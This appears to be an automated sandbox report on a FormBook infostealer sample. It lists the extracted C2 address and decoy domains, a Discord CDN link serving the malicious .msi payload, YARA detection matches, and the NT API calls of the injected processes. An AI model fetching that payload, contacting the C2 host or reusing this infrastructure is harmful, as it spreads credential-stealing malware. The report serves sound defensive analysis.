Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F10D0 NtOpenProcessToken,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0060 NtQuerySection,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F01D4 NtSetValueKey,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F010C NtOpenDirectoryObject,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1148 NtOpenThread,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F07AC NtCreateMutant,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF8CC NtWaitForSingleObject,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF938 NtWriteFile,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1930 NtSetContextThread,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAB8 NtQueryValueKey,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA20 NtQueryInformationFile,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA50 NtEnumerateValueKey,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBE8 NtQueryVirtualMemory,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB50 NtCreateKey,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC30 NtOpenProcess,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC48 NtSetInformationFile,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0C40 NtGetContextThread,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1D80 NtSuspendThread,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD5C NtEnumerateKey,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFE24 NtWriteVirtualMemory,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFFC NtCreateProcessEx,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0078 NtResumeThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0060 NtQuerySection,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1148 NtOpenThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF938 NtWriteFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099D50 NtCreateFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E00 NtReadFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E80 NtClose,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F30 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099DFB NtReadFile,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F2B NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9DAE NtResumeThread,NtClose,
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE0C6
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092D005
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091905A
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00903040
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE2E9
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A1238
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FF3CF
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009263DB
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00902305
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00907353
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0094A37B
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00935485
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00911489
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0093D47D
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091C5F0
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090351F
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00904680
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090E6C1
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A2622
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098579A
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C7BC
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009357C3
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099F8EE
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C85C
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092286D
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A098E
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009029B2
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009169FE
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00985955
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009B3A83
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009ACBA4
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098DBDA
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FFBD7
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00927B00
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099FDDD
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00930D3B
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090CD5B
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00932E2F
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091EE4C
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00910F3F
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092DF7C
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A1238
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE2E9
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02202305
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A37B
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02207353
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A63BF
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FF3CF
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022263DB
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222D005
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02203040
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221905A
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE0C6
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A2622
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A634
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02204680
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220E6C1
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C7BC
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228579A
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022357C3
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0223D47D
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02235485
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02211489
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220351F
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02246540
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221C5F0
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022B3A83
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02227B00
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022ACBA4
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FFBD7
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228DBDA
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222286D
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C85C
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229F8EE
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02285955
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022029B2
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A098E
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022169FE
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02232E2F
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221EE4C
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02210F3F
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222DF7C
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02230D3B
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220CD5B
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229FDDD
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E071
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E5FC
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D87
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D90
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00089E30
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082FB0
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1069
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1072
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E8132
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDA6F
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EAA32
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDB0E
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B1F
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B22
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CEC
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CF2
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
